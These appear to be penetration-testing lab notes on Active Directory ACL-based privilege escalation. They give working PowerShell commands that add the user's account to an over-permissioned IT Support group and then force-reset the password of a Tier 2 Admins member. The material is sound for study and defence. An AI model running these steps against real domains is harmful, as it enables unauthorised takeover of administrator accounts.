Permission Delegation

If possible, the target system should first be enumerated with BloodHound.

Active Directory can delegate permissions and privileges through a feature called Permission Delegation.

For example, using delegation we can grant the Help-Desk team the permission to force-change a user's password; the team then holds a delegated privilege for that specific function.

Permission delegation exploits are often referred to as ACL-based attacks. AD allows administrators to configure Access Control Entries (ACEs), which populate Discretionary Access Control Lists (DACLs), hence the name ACL-based attacks. Almost any AD object can be secured with ACEs.


Privilege Escalation

Scenario

An administrator has misconfigured the permission delegation of the IT Support group by granting the Domain Users group the AddMembers ACE.

This means that any member of the Domain Users group (including our account) can add accounts to the IT Support group.

Furthermore, the IT Support group holds the ForceChangePassword ACE over the members of the Tier 2 Admins group.


AddMember

# The first step is to add our AD Account to the IT Support Group
Add-ADGroupMember "IT Support" -Members "AD-Username"
# If Everything Worked, we should see our Account as a Member
Get-ADGroupMember -Identity "IT Support"

ForceChangePassword

Now that we are a member of the IT Support group, we have inherited its ForceChangePassword permission delegation over the Tier 2 Admins group.

Next we need to identify the members of the Tier 2 Admins group and select a target.

# List Possible Targets
Get-ADGroupMember -Identity "Tier 2 Admins"

# Setting New Password for the Target
$Password = ConvertTo-SecureString "New-Password" -AsPlainText -Force
Set-ADAccountPassword -Identity "AD-Username-Target" -Reset -NewPassword $Password

Access Denied Error

If we get an [Access Denied] error, our new permissions have not yet propagated through the domain.

We can either run the commands below or wait for the permissions to update automatically; the refresh interval is defined by system policy.

:: Updates Group Policy Settings
gpupdate /force

:: [Detailed Information] Generate a Report
gpresult /H report.html